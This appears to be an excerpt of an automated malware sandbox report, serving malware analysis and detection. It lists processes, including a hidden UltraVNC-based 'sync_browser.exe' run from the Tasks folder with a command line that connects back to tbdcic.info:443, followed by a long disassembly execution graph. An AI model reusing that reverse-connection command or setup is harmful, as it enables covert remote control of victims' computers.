                                                                    Commandline:C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
                                                                    Imagebase:0x7ff7e5070000
                                                                    File size:1'945'368 bytes
                                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1496705820.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:true

                                                                    Target ID:27
                                                                    Start time:09:28:56
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 2
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:09:28:58
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 4
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:29
                                                                    Start time:09:29:02
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:32
                                                                    Start time:09:29:44
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:09:30:26
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:35
                                                                    Start time:09:31:08
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                      Execution Graph

                                                                      Execution Coverage:18.3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:26.6%
                                                                      Total number of Nodes:1618
                                                                      Total number of Limit Nodes:14
8947 40384e ??3@YAXPAX 8941->8947 8949 403859 8942->8949 8943 4037a7 9049 408dbf 8943->9049 8945 403808 ??3@YAXPAX 8945->8949 8946 4037ba memcpy 8946->8950 8947->8949 8949->8839 8950->8943 8950->8945 8950->8946 8951 401b75 4 API calls 8950->8951 8951->8950 9071 40ca45 8952->9071 8956 401172 2 API calls 8955->8956 8957 401358 8956->8957 8957->8864 8959 40133e 2 API calls 8958->8959 8960 4132bc 8959->8960 8960->8897 8988 40cb96 8961->8988 8964 40cbd1 8965 40cbec ??3@YAXPAX 8964->8965 8966 40cbd6 _CxxThrowException 8964->8966 8965->8893 8966->8965 8968 40cb24 VariantClear 8967->8968 8969 40cb79 8968->8969 8970 40cb92 8969->8970 8971 40cb7d memcpy 8969->8971 8970->8899 8971->8970 8973 40cc21 8972->8973 8974 40cc26 8972->8974 8975 40cb96 VariantClear 8973->8975 8974->8893 8975->8974 8977 40cc41 8976->8977 8978 40cc46 8976->8978 8979 40cb96 VariantClear 8977->8979 8978->8893 8979->8978 8981 40cc01 8980->8981 8982 40cbfc 8980->8982 8981->8893 8983 40cb96 VariantClear 8982->8983 8983->8981 8985 40ff0d 8984->8985 8986 40ff29 8985->8986 8995 40cc5f 8985->8995 8986->8893 8991 40cb24 8988->8991 8990 40cb9e SysAllocString 8990->8964 8990->8965 8994 40cb2c 8991->8994 8992 40cb45 VariantClear 8992->8990 8993 40cb5c 8993->8990 8994->8992 8994->8993 8996 40cc68 8995->8996 8998 40cc6d 8995->8998 8997 40cb96 VariantClear 8996->8997 8997->8998 8998->8986 9000 4013df 2 API calls 8999->9000 9001 401439 9000->9001 9001->8914 9008 402ff3 9002->9008 9004 403363 9005 403384 9004->9005 9006 403368 GetLastError 9004->9006 9005->8920 9007 403373 9006->9007 9007->8920 9009 403000 GetFileAttributesW 9008->9009 9010 402ffc 9008->9010 9011 403011 9009->9011 9012 403016 9009->9012 9010->9004 9011->9004 9013 403034 9012->9013 9014 40301a SetFileAttributesW 9012->9014 9019 402ee6 9013->9019 9015 403030 9014->9015 9016 403027 DeleteFileW 9014->9016 9015->9004 9016->9004 9020 402771 2 API calls 9019->9020 9021 402efd 9020->9021 9022 4027c2 2 API calls 9021->9022 9023 402f0a FindFirstFileW 9022->9023 
9024 402fc2 SetFileAttributesW 9023->9024 9038 402f2c 9023->9038 9026 402fe5 ??3@YAXPAX 9024->9026 9027 402fcd RemoveDirectoryW 9024->9027 9025 401370 2 API calls 9025->9038 9029 402fed 9026->9029 9027->9026 9028 402fda ??3@YAXPAX 9027->9028 9028->9029 9029->9004 9031 4027c2 2 API calls 9031->9038 9032 402f91 SetFileAttributesW 9032->9026 9036 402f9a DeleteFileW 9032->9036 9033 402f5c lstrcmpW 9034 402f72 lstrcmpW 9033->9034 9035 402fa5 FindNextFileW 9033->9035 9034->9035 9034->9038 9037 402fbb FindClose 9035->9037 9035->9038 9036->9038 9037->9024 9038->9025 9038->9026 9038->9031 9038->9032 9038->9033 9038->9035 9039 402ee6 2 API calls 9038->9039 9040 401526 9038->9040 9039->9038 9041 4013df 2 API calls 9040->9041 9042 401530 9041->9042 9042->9038 9044 401bb6 9043->9044 9045 401b86 GetLastError 9043->9045 9044->8932 9046 401ba0 GetFileAttributesW 9045->9046 9048 401b95 9045->9048 9046->9044 9046->9048 9047 401b96 SetLastError 9047->8932 9048->9044 9048->9047 9050 402187 19 API calls 9049->9050 9051 408dd3 wvsprintfW 9050->9051 9052 408ea2 9051->9052 9053 408df4 GetLastError FormatMessageW 9051->9053 9056 408cdb 27 API calls 9052->9056 9054 408e22 FormatMessageW 9053->9054 9055 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9053->9055 9054->9052 9054->9055 9060 408cdb 9055->9060 9058 408eae 9056->9058 9058->8942 9061 408d50 ??3@YAXPAX LocalFree 9060->9061 9062 408cea 9060->9062 9061->9058 9063 407c87 4 API calls 9062->9063 9064 408cf9 IsWindow 9063->9064 9065 408d10 IsBadReadPtr 9064->9065 9068 408d22 9064->9068 9065->9068 9066 407ce8 22 API calls 9067 408d48 9066->9067 9070 407a5b ??3@YAXPAX 9067->9070 9068->9066 9070->9061 9072 40ca28 2 API calls 9071->9072 9073 401a46 9072->9073 9073->8860 9073->8861 9079 40c88e 9074->9079 9077 40c993 9077->8811 9078 40c96e CreateFileW 9078->9077 9080 40c898 CloseHandle 9079->9080 9081 40c8a3 9079->9081 9080->9081 9081->9077 9081->9078 9083 410a59 9082->9083 9098 40ea08 9082->9098 9083->9098 9185 410817 9083->9185 9085 
410c33 9086 40ce5c ctype 4 API calls 9085->9086 9086->9098 9088 410817 7 API calls 9089 410af5 9088->9089 9089->9085 9090 410b25 9089->9090 9192 40ce5c 9090->9192 9092 410b2e 9093 410bab 9092->9093 9095 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9092->9095 9093->9093 9094 40ce5c ctype 4 API calls 9093->9094 9096 410be7 9094->9096 9095->9092 9097 40ce5c ctype 4 API calls 9096->9097 9097->9098 9098->8757 9099 406eb0 InitializeCriticalSection 9098->9099 9099->8769 9226 40e214 9100->9226 9156 40e46e 9155->9156 9157 4107a2 4 API calls 9156->9157 9158 40e485 9157->9158 9158->8769 9186 40cdda ctype 3 API calls 9185->9186 9187 410823 9186->9187 9196 40cd11 9187->9196 9189 41082d 9190 41083f 9189->9190 9191 40ef63 4 API calls 9189->9191 9190->9085 9190->9088 9191->9189 9193 40ce3b 9192->9193 9204 40ccfd 9193->9204 9197 40cda5 9196->9197 9199 40cd24 9196->9199 9197->9189 9198 40cd33 _CxxThrowException 9198->9199 9199->9198 9200 40cd63 ??2@YAPAXI 9199->9200 9201 40cd95 ??3@YAXPAX 9199->9201 9200->9199 9202 40cd79 memcpy 9200->9202 9201->9197 9202->9201 9210 409f10 9204->9210 9213 401cfa 9204->9213 9216 40c7e0 9204->9216 9222 40b880 9204->9222 9205 40cd0e ??3@YAXPAX 9205->9092 9211 401d13 free 9210->9211 9212 409f1a 9211->9212 9212->9205 9214 401d01 VirtualFree 9213->9214 9215 401d12 9213->9215 9214->9215 9215->9205 9217 40c805 9216->9217 9218 401d13 free 9217->9218 9219 40c80e 9218->9219 9220 40c830 9219->9220 9221 40c827 ??3@YAXPAX 9219->9221 9220->9205 9221->9220 9223 40b8a6 9222->9223 9224 401d13 free 9223->9224 9225 40b8cc 9224->9225 9225->9205 9227 40cdda ctype 3 API calls 9226->9227 9228 40e21c 9227->9228 9229 40cdda ctype 3 API calls 9228->9229 9230 40e224 9229->9230 9231 40cdda ctype 3 API calls 9230->9231 9232 40e22c 9231->9232 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 
9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9868 401d21 GetModuleHandleW CreateWindowExW 9513->9868 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9871 4044c6 9523->9871 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9880 402dd6 9529->9880 9531 405802 9894 4043f8 9531->9894 9535 405821 _wtol 9537 405837 9535->9537 9899 404903 #17 9537->9899 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10100 404e99 9541->10100 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10117 404513 9545->10117 10122 4052a7 9546->10122 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9563 405872 9557->9563 9570 405947 9558->9570 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9567 405b00 9562->9567 9563->9545 9564 405a05 9564->9563 9565 405a38 9564->9565 9569 405a21 _wtol 9564->9569 9566 4043f8 3 API calls 9565->9566 9578 405a97 9566->9578 9568 405b85 9567->9568 9572 401370 2 API calls 9567->9572 9925 4023a0 9568->9925 9569->9565 9570->9559 9570->9563 9570->9564 9570->9565 9577 401526 2 API calls 9570->9577 9574 405b35 9572->9574 9576 401370 2 API calls 9574->9576 9575 401370 2 API calls 9579 405bab ??2@YAPAXI 9575->9579 9583 405b4b 9576->9583 9577->9570 9578->9559 9580 404a97 2 API calls 9578->9580 9581 405bb7 9579->9581 9582 405ac8 9580->9582 9928 
40c9d7 9581->9928 9582->9559 9584 4013a9 2 API calls 9582->9584 9585 4013a9 2 API calls 9583->9585 9584->9559 9586 405b75 9585->9586 9588 402187 19 API calls 9586->9588 9590 405b7c 9588->9590 9593 4027c2 2 API calls 9590->9593 9591 405be4 9594 408dbf 57 API calls 9591->9594 9592 405c0a 9931 402823 9592->9931 9593->9568 9594->9563 9598 405c1f 9599 405c25 9598->9599 9600 405c49 9598->9600 9602 408dbf 57 API calls 9599->9602 9601 405cdb 9600->9601 9604 4043f8 3 API calls 9600->9604 9605 40cdda ctype 3 API calls 9601->9605 9603 405c2d ??3@YAXPAX 9602->9603 9603->9563 9606 405c60 9604->9606 9607 405ce3 9605->9607 9606->9601 9616 405c66 9606->9616 9608 405d08 9607->9608 10156 403400 9607->10156 9610 405d11 9608->9610 9611 405cbf ??3@YAXPAX 9608->9611 9614 405d82 9610->9614 9615 405d1d wsprintfW 9610->9615 9621 401458 2 API calls 9610->9621 9624 401370 ??2@YAPAXI ??3@YAXPAX 9610->9624 9626 402187 19 API calls 9610->9626 10185 4032d9 ??2@YAPAXI 9610->10185 10191 40269a ??3@YAXPAX ??3@YAXPAX 9610->10191 9611->9563 9613 405cfd ??3@YAXPAX 9613->9563 9965 404b06 9614->9965 9618 401458 2 API calls 9615->9618 9616->9611 10130 4054c1 9616->10130 9618->9610 9620 405c95 9620->9611 9622 405c9b 9620->9622 9621->9610 9623 408dbf 57 API calls 9622->9623 9625 405ca3 ??3@YAXPAX 9623->9625 9624->9610 9625->9563 9626->9610 9627 406006 9628 404b06 26 API calls 9627->9628 9629 406015 9628->9629 9631 40619d 9629->9631 10217 40244e AllocateAndInitializeSid 9629->10217 10024 4026b0 9631->10024 9636 40624e 10027 4045f4 9636->10027 9638 40603a 9641 401458 2 API calls 9638->9641 9639 402771 2 API calls 9682 4061b5 9639->9682 9643 406042 9641->9643 9646 401458 2 API calls 9643->9646 9644 4062e1 CoInitialize 9652 4026b0 lstrcmpW 9644->9652 9645 406275 9648 4026b0 lstrcmpW 9645->9648 9649 40604a GetCommandLineW 9646->9649 9651 406284 9648->9651 9653 404a97 2 API calls 9649->9653 9650 406250 ??3@YAXPAX 9650->9636 9654 406294 9651->9654 9658 402187 19 API calls 9651->9658 9655 406307 9652->9655 9656 
40605a 9653->9656 10226 4041ab 9654->10226 9659 40631b 9655->9659 9662 401370 2 API calls 9655->9662 9660 402771 2 API calls 9656->9660 9657 401458 ??2@YAPAXI ??3@YAXPAX 9657->9682 9658->9654 9664 4041c4 16 API calls 9659->9664 9663 406065 9660->9663 9662->9659 9668 4048a9 2 API calls 9663->9668 9669 406321 9664->9669 9666 4013a9 2 API calls 9666->9682 9667 40421b lstrlenW lstrlenW _wcsnicmp 9675 405d8b 9667->9675 9671 406083 9668->9671 9672 4026b0 lstrcmpW 9669->9672 9670 407ce8 22 API calls 9673 4062b7 9670->9673 9676 4048c7 2 API calls 9671->9676 9677 406330 9672->9677 10229 407a5b ??3@YAXPAX 9673->10229 9674 401370 2 API calls 9674->9682 9675->9627 9675->9667 9699 405f6a _wtol 9675->9699 9726 40614a ??3@YAXPAX 9675->9726 10192 404d50 9675->10192 10203 40464b 9675->10203 9683 406090 9676->9683 9679 406344 9677->9679 9680 406337 _wtol 9677->9680 9684 40636a 9679->9684 10230 408f81 9679->10230 9680->9679 9681 4062c2 ??3@YAXPAX 9681->9563 9682->9636 9682->9639 9682->9650 9682->9657 9682->9666 9682->9674 9685 4032d9 7 API calls 9682->9685 10225 40269a ??3@YAXPAX ??3@YAXPAX 9682->10225 9686 4048c7 2 API calls 9683->9686 9689 40637e 9684->9689 9691 406355 ??3@YAXPAX 9684->9691 10246 408eb4 9684->10246 9685->9682 9687 40609d 9686->9687 10220 4048e5 9687->10220 9701 401458 2 API calls 9689->9701 9705 406503 ??3@YAXPAX 9689->9705 9706 4063bc GetKeyState 9689->9706 9710 406563 9689->9710 9711 401370 ??2@YAPAXI ??3@YAXPAX 9689->9711 9712 4026b0 lstrcmpW 9689->9712 9718 401526 ??2@YAPAXI ??3@YAXPAX 9689->9718 9727 406520 9689->9727 9729 406553 ??3@YAXPAX ??3@YAXPAX 9689->9729 9730 4064f8 ??3@YAXPAX 9689->9730 10273 408461 9689->10273 10286 4084df 9689->10286 9691->9684 9695 40622b ??3@YAXPAX 9697 4026b0 lstrcmpW 9695->9697 9696 401551 2 API calls 9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX 
??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10033 404545 9714->10033 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10046 40172c ??2@YAPAXI 9736->10046 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 
9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 9832->9833 9834 4041f8 20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10063 40241d 9835->10063 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 
9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10072 4048a9 9845->10072 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10082 404f67 9860->10082 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9886 401458 2 API calls 9886->9887 9887->9882 9887->9886 9888 401526 ??2@YAPAXI ??3@YAXPAX 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 
9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 4026b0 lstrcmpW 9965->9966 9967 404b1f 9966->9967 9968 404b6f 9967->9968 9970 401370 2 API calls 9967->9970 9969 4026b0 lstrcmpW 9968->9969 9971 404b8d 9969->9971 9972 404b36 9970->9972 9974 4026b0 lstrcmpW 9971->9974 9973 402187 19 API calls 9972->9973 9975 404b3d 9973->9975 
9976 404ba5 9974->9976 9977 4027c2 2 API calls 9975->9977 9979 4026b0 lstrcmpW 9976->9979 9978 404b46 9977->9978 9980 401370 2 API calls 9978->9980 9981 404bbd 9979->9981 9982 404b5f 9980->9982 9984 4026b0 lstrcmpW 9981->9984 9983 402187 19 API calls 9982->9983 9985 404b66 9983->9985 9986 404bd5 9984->9986 9987 4027c2 2 API calls 9985->9987 9988 404bec 9986->9988 9989 404bdc lstrcmpiW 9986->9989 9987->9968 9990 4026b0 lstrcmpW 9988->9990 9989->9988 9991 404c02 9990->9991 9992 4026b0 lstrcmpW 9991->9992 9993 404c2f 9992->9993 9994 404c3c 9993->9994 10526 4043a6 9993->10526 9996 4026b0 lstrcmpW 9994->9996 10000 404c50 9996->10000 9997 404c70 9999 4026b0 lstrcmpW 9997->9999 10006 404c83 9999->10006 10000->9997 10001 4026b0 lstrcmpW 10000->10001 10530 40434d 10000->10530 10001->10000 10002 404ca3 10003 4026b0 lstrcmpW 10002->10003 10005 404caf 10003->10005 10007 4026b0 lstrcmpW 10005->10007 10006->10002 10008 4026b0 lstrcmpW 10006->10008 10534 40437e 10006->10534 10009 404cc0 10007->10009 10008->10006 10010 4026b0 lstrcmpW 10009->10010 10011 404cd1 10010->10011 10012 404ce7 10011->10012 10013 404cde _wtol 10011->10013 10014 4026b0 lstrcmpW 10012->10014 10013->10012 10015 404cf3 10014->10015 10016 404d03 10015->10016 10017 404cfa _wtol 10015->10017 10018 4026b0 lstrcmpW 10016->10018 10017->10016 10019 404d0f 10018->10019 10020 4026b0 lstrcmpW 10019->10020 10021 404d27 10020->10021 10022 4026b0 lstrcmpW 10021->10022 10023 404d3f 10022->10023 10023->9675 10542 40261a 10024->10542 10028 404648 10027->10028 10030 404605 10027->10030 10028->9644 10028->9645 10029 40133e 2 API calls 10029->10030 10030->10029 10031 4041f8 20 API calls 10030->10031 10032 404622 SetEnvironmentVariableW ??3@YAXPAX 10031->10032 10032->10028 10032->10030 10034 401458 2 API calls 10033->10034 10035 404556 10034->10035 10036 4027aa 2 API calls 10035->10036 10037 40455f GetTempPathW 10036->10037 10038 404578 10037->10038 10043 40458f 10037->10043 10039 4027aa 2 API calls 10038->10039 10040 404583 
